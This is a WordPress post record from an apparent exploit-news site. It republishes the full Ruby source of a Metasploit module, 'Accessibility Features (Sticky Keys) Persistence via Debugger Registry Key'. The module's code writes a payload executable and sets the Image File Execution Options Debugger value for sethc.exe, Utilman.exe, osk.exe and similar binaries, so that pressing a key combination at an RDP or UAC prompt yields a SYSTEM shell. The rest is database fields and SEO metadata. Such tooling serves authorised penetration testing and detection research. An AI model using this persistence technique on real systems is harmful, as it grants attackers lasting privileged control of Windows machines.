{"id":34941,"date":"2026-01-09T13:47:20","date_gmt":"2026-01-09T13:47:20","guid":{"rendered":"http:\/\/localhost\/?p=34941"},"modified":"2026-01-09T13:47:20","modified_gmt":"2026-01-09T13:47:20","slug":"accessibility-features-sticky-keys-persistence-via-debugger-registry-key","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=34941","title":{"rendered":"Accessibility Features (Sticky Keys) Persistence via Debugger Registry Key_MSF:EXPLOIT-WINDOWS-PERSISTENCE-ACCESSIBILITY_FEATURES_DEBUGGER-"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-01-09T19:04:55&#8243;,&#8221;description&#8221;:&#8221;This module makes it possible to apply the &#8216;sticky keys&#8217; hack to a session with appropriate rights. The hack provides a means to get a SYSTEM shell using UI-level interaction at an RDP login screen or via a UAC confirmation dialog. The module modifies&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-01-09T18:58:43&#8243;,&#8221;modified&#8221;:&#8221;2026-01-09T18:58:43&#8243;,&#8221;type&#8221;:&#8221;metasploit&#8221;,&#8221;title&#8221;:&#8221;Accessibility Features (Sticky Keys) Persistence via Debugger Registry Key&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;MSF:EXPLOIT-WINDOWS-PERSISTENCE-ACCESSIBILITY_FEATURES_DEBUGGER-&#8220;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[],&#8221;sourceData&#8221;:&#8221;##\\n# This module requires Metasploit: https:\/\/metasploit.com\/download\\n# Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n##\\n\\nclass MetasploitModule \\u003c Msf::Exploit::Local\\n  Rank = ExcellentRanking\\n\\n  include Msf::Post::File\\n  include Msf::Exploit::EXE\\n  include Msf::Exploit::Local::Persistence\\n  prepend Msf::Exploit::Remote::AutoCheck\\n  include Msf::Post::Windows::Registry\\n  include Msf::Post::Windows::Priv\\n  include Msf::Exploit::Deprecated\\n  moved_from &#8216;post\/windows\/manage\/sticky_keys&#8217;\\n\\n  DEBUG_REG_PATH = &#8216;HKLM\\\\\\\\SOFTWARE\\\\\\\\Microsoft\\\\\\\\Windows NT\\\\\\\\CurrentVersion\\\\\\\\Image File Execution Options&#8217;\\n  DEBUG_REG_VALUE = &#8216;Debugger&#8217;\\n\\n  def initialize(info = {})\\n    super(\\n      update_info(\\n        info,\\n        &#8216;Name&#8217; =\\u003e &#8216;Accessibility Features (Sticky Keys) Persistence via Debugger Registry Key&#8217;,\\n        &#8216;Description&#8217; =\\u003e %q{\\n          This module makes it possible to apply the &#8216;sticky keys&#8217; hack to a session with appropriate\\n          rights. The hack provides a means to get a SYSTEM shell using UI-level interaction at an RDP\\n          login screen or via a UAC confirmation dialog. The module modifies the Debug registry setting\\n          for certain executables.\\n\\n          The module options allow for this hack to be applied to:\\n\\n          SETHC   (sethc.exe is invoked when SHIFT is pressed 5 times),\\n          UTILMAN (Utilman.exe is invoked by pressing WINDOWS+U),\\n          OSK     (osk.exe is invoked by pressing WINDOWS+U, then launching the on-screen keyboard),\\n          DISP    (DisplaySwitch.exe is invoked by pressing WINDOWS+P),\\n          NARRATOR (Narrator.exe is invoked by pressing WINDOWS+CTR+ENTER),\\n          ATBROKER (AtBroker.exe is invoked by launching accessibility features from the login screen, such as WINDOWS+CTR+ENTER).\\n\\n          Custom payloads and binaries can be run as part of this exploit, but must be manually uploaded\\n          to the target prior to running the module.\\n        },\\n        &#8216;Author&#8217; =\\u003e [\\n          &#8216;OJ Reeves&#8217;, # original module\\n          &#8216;h00die&#8217; # persistence mixin, narrator, atbroker, docs\\n        ],\\n        &#8216;Platform&#8217; =\\u003e [&#8216;win&#8217;],\\n        &#8216;SessionTypes&#8217; =\\u003e [&#8216;meterpreter&#8217;, &#8216;shell&#8217;],\\n        &#8216;References&#8217; =\\u003e [\\n          [&#8216;URL&#8217;, &#8216;https:\/\/web.archive.org\/web\/20170201184448\/https:\/\/social.technet.microsoft.com\/Forums\/windows\/en-US\/a3968ec9-5824-4bc2-82a2-a37ea88c273a\/sticky-keys-exploit&#8217;],\\n          [&#8216;URL&#8217;, &#8216;https:\/\/blog.carnal0wnage.com\/2012\/04\/privilege-escalation-via-sticky-keys.html&#8217;],\\n          [&#8216;URL&#8217;, &#8216;https:\/\/support.microsoft.com\/en-us\/windows\/appendix-b-narrator-keyboard-commands-and-touch-gestures-8bdab3f4-b3e9-4554-7f28-8b15bd37410a&#8217;],\\n          [&#8216;ATT\\u0026CK&#8217;, Mitre::Attack::Technique::T1183_IMAGE_FILE_EXECUTION_OPTIONS_INJECTION],\\n          [&#8216;ATT\\u0026CK&#8217;, Mitre::Attack::Technique::T1546_008_ACCESSIBILITY_FEATURES],\\n          [&#8216;URL&#8217;, &#8216;https:\/\/blogs.msdn.microsoft.com\/mithuns\/2010\/03\/24\/image-file-execution-options-ifeo\/&#8217;]\\n        ],\\n        &#8216;Targets&#8217; =\\u003e [\\n          [ &#8216;Automatic&#8217;, {} ]\\n        ],\\n        &#8216;DefaultTarget&#8217; =\\u003e 0,\\n        &#8216;DisclosureDate&#8217; =\\u003e &#8216;1995-04-24&#8217;, # windows 95 release date which included first sticky keys\\n        &#8216;Notes&#8217; =\\u003e {\\n          &#8216;Stability&#8217; =\\u003e [CRASH_SAFE],\\n          &#8216;Reliability&#8217; =\\u003e [REPEATABLE_SESSION, EVENT_DEPENDENT],\\n          &#8216;SideEffects&#8217; =\\u003e [ARTIFACTS_ON_DISK, CONFIG_CHANGES]\\n        }\\n      )\\n    )\\n\\n    register_options([\\n      OptString.new(&#8216;PAYLOAD_NAME&#8217;, [false, &#8216;Name of payload file to write. Random string as default.&#8217;]),\\n      OptEnum.new(&#8216;BINARY&#8217;, [true, &#8216;The target binary to add the exploit to.&#8217;, &#8216;SETHC&#8217;, [&#8216;SETHC&#8217;, &#8216;UTILMAN&#8217;, &#8216;OSK&#8217;, &#8216;DISP&#8217;, &#8216;NARRATOR&#8217;, &#8216;ATBROKER&#8217;]]),\\n    ])\\n  end\\n\\n  #\\n  # Returns the name of the executable to modify the debugger settings of.\\n  #\\n  def get_target_exe_name\\n    case datastore[&#8216;BINARY&#8217;]\\n    when &#8216;UTILMAN&#8217;\\n      &#8216;Utilman.exe&#8217;\\n    when &#8216;OSK&#8217;\\n      &#8216;osk.exe&#8217;\\n    when &#8216;DISP&#8217;\\n      &#8216;DisplaySwitch.exe&#8217;\\n    when &#8216;NARRATOR&#8217;\\n      &#8216;Narrator.exe&#8217;\\n    when &#8216;ATBROKER&#8217;\\n      &#8216;AtBroker.exe&#8217;\\n    else\\n      &#8216;sethc.exe&#8217;\\n    end\\n  end\\n\\n  #\\n  # Returns the key combinations required to invoke the exploit once installed.\\n  #\\n  def get_target_key_combo\\n    case datastore[&#8216;BINARY&#8217;]\\n    when &#8216;UTILMAN&#8217;\\n      &#8216;WINDOWS+U&#8217;\\n    when &#8216;OSK&#8217;\\n      &#8216;WINDOWS+U, then launching the on-screen keyboard&#8217;\\n    when &#8216;DISP&#8217;\\n      &#8216;WINDOWS+P&#8217;\\n    when &#8216;NARRATOR&#8217;\\n      &#8216;WINDOWS+CTR+ENTER&#8217;\\n    when &#8216;ATBROKER&#8217;\\n      &#8216;Launching accessibility features from the login screen (such as WINDOWS+CTR+ENTER)&#8217;\\n    else\\n      &#8216;SHIFT 5 times&#8217;\\n    end\\n  end\\n\\n  #\\n  # Returns the full path to the target&#8217;s registry key based on the current target\\n  # settings.\\n  #\\n  def get_target_exe_reg_key\\n    \\&#8221;#{DEBUG_REG_PATH}\\\\\\\\#{get_target_exe_name}\\&#8221;\\n  end\\n\\n  def writable_dir\\n    d = super\\n    return session.sys.config.getenv(d) if d.start_with?(&#8216;%&#8217;)\\n\\n    d\\n  end\\n\\n  def check\\n    print_warning(&#8216;Payloads in %TEMP% will only last until reboot, you want to choose elsewhere.&#8217;) if datastore[&#8216;WritableDir&#8217;].start_with?(&#8216;%TEMP%&#8217;) # check the original value\\n    return CheckCode::Safe(\\&#8221;#{writable_dir} doesnt exist\\&#8221;) unless exists?(writable_dir)\\n\\n    return CheckCode::Safe(&#8216;You have admin rights to run this Module&#8217;) unless is_admin?\\n\\n    CheckCode::Appears(&#8216;Likely exploitable&#8217;)\\n  end\\n\\n  def install_persistence\\n    payload_name = datastore[&#8216;PAYLOAD_NAME&#8217;] || Rex::Text.rand_text_alpha((rand(6..13)))\\n    temp_path = writable_dir\\n    payload_exe = generate_payload_exe\\n    payload_pathname = temp_path + &#8216;\\\\\\\\&#8217; + payload_name + &#8216;.exe&#8217;\\n    vprint_status(\\&#8221;Payload pathname: #{payload_pathname}\\&#8221;)\\n    fail_with(Failure::UnexpectedReply, \\&#8221;Error writing payload to: #{payload_pathname}\\&#8221;) unless write_file(payload_pathname, payload_exe)\\n    target_key = get_target_exe_reg_key\\n    registry_createkey(target_key)\\n    registry_setvaldata(target_key, DEBUG_REG_VALUE, payload_pathname, &#8216;REG_SZ&#8217;)\\n\\n    print_good(\\&#8221;&#8216;Sticky keys&#8217; successfully added. Launch the exploit at an RDP or UAC prompt by pressing #{get_target_key_combo}.\\&#8221;)\\n    @clean_up_rc \\u003c\\u003c \\&#8221;rm \\\\\\&#8221;#{payload_pathname.gsub(&#8216;\\\\\\\\&#8217;, &#8216;\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\&#8217;)}\\\\\\&#8221;\\\\n\\&#8221;\\n    @clean_up_rc \\u003c\\u003c \\&#8221;execute -f cmd.exe -a \\\\\\&#8221;\/c reg delete \\\\\\&#8221;#{target_key}\\\\\\&#8221; \/v GlobalFlag \/f\\\\\\&#8221; -H\\\\n\\&#8221;\\n  end\\nend\\n&#8221;,&#8221;sourceHref&#8221;:&#8221;https:\/\/github.com\/rapid7\/metasploit-framework\/blob\/master\/modules\/exploits\/windows\/persistence\/accessibility_features_debugger.rb&#8221;,&#8221;cvss&#8221;:{&#8220;score&#8221;:0,&#8221;severity&#8221;:&#8221;NONE&#8221;,&#8221;vector&#8221;:&#8221;NONE&#8221;,&#8221;version&#8221;:&#8221;NONE&#8221;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/www.rapid7.com\/db\/modules\/exploit\/windows\/persistence\/accessibility_features_debugger\/&#8221;,&#8221;category_name&#8221;:&#8221;Exploit&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-01-09T19:04:55&#8243;,&#8221;description&#8221;:&#8221;This module makes it possible to apply the &#8216;sticky keys&#8217; hack to a session with appropriate rights. The hack provides a means to get a&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,169,13,33,7,11,5],"class_list":["post-34941","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-metasploit","tag-news","tag-none","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Accessibility Features (Sticky Keys) Persistence via Debugger Registry Key_MSF:EXPLOIT-WINDOWS-PERSISTENCE-ACCESSIBILITY_FEATURES_DEBUGGER- zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=34941\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Accessibility Features (Sticky Keys) Persistence via Debugger Registry Key_MSF:EXPLOIT-WINDOWS-PERSISTENCE-ACCESSIBILITY_FEATURES_DEBUGGER- zero redgem\" \/>\n<meta property=\"og:description\" content=\"{&#8220;lastseen&#8221;:&#8221;2026-01-09T19:04:55&#8243;,&#8221;description&#8221;:&#8221;This module makes it possible to apply the &#8216;sticky keys&#8217; hack to a session with appropriate rights. The hack provides a means to get a...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=34941\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-01-09T13:47:20+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"6 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=34941#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=34941\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"Accessibility Features (Sticky Keys) Persistence via Debugger Registry Key_MSF:EXPLOIT-WINDOWS-PERSISTENCE-ACCESSIBILITY_FEATURES_DEBUGGER-\",\"datePublished\":\"2026-01-09T13:47:20+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=34941\"},\"wordCount\":1122,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"exploit\",\"metasploit\",\"news\",\"NONE\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=34941#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=34941\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=34941\",\"name\":\"Accessibility Features (Sticky Keys) Persistence via Debugger Registry Key_MSF:EXPLOIT-WINDOWS-PERSISTENCE-ACCESSIBILITY_FEATURES_DEBUGGER- zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-01-09T13:47:20+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=34941#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=34941\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=34941#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Accessibility Features (Sticky Keys) Persistence via Debugger Registry Key_MSF:EXPLOIT-WINDOWS-PERSISTENCE-ACCESSIBILITY_FEATURES_DEBUGGER-\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Accessibility Features (Sticky Keys) Persistence via Debugger Registry Key_MSF:EXPLOIT-WINDOWS-PERSISTENCE-ACCESSIBILITY_FEATURES_DEBUGGER- zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=34941","og_locale":"en_US","og_type":"article","og_title":"Accessibility Features (Sticky Keys) Persistence via Debugger Registry Key_MSF:EXPLOIT-WINDOWS-PERSISTENCE-ACCESSIBILITY_FEATURES_DEBUGGER- zero redgem","og_description":"{&#8220;lastseen&#8221;:&#8221;2026-01-09T19:04:55&#8243;,&#8221;description&#8221;:&#8221;This module makes it possible to apply the &#8216;sticky keys&#8217; hack to a session with appropriate rights. The hack provides a means to get a...","og_url":"https:\/\/zero.redgem.net\/?p=34941","og_site_name":"zero redgem","article_published_time":"2026-01-09T13:47:20+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"6 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=34941#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=34941"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"Accessibility Features (Sticky Keys) Persistence via Debugger Registry Key_MSF:EXPLOIT-WINDOWS-PERSISTENCE-ACCESSIBILITY_FEATURES_DEBUGGER-","datePublished":"2026-01-09T13:47:20+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=34941"},"wordCount":1122,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","exploit","metasploit","news","NONE","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=34941#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=34941","url":"https:\/\/zero.redgem.net\/?p=34941","name":"Accessibility Features (Sticky Keys) Persistence via Debugger Registry Key_MSF:EXPLOIT-WINDOWS-PERSISTENCE-ACCESSIBILITY_FEATURES_DEBUGGER- zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-01-09T13:47:20+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=34941#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=34941"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=34941#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"Accessibility Features (Sticky Keys) Persistence via Debugger Registry Key_MSF:EXPLOIT-WINDOWS-PERSISTENCE-ACCESSIBILITY_FEATURES_DEBUGGER-"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/34941","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=34941"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/34941\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=34941"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=34941"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=34941"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}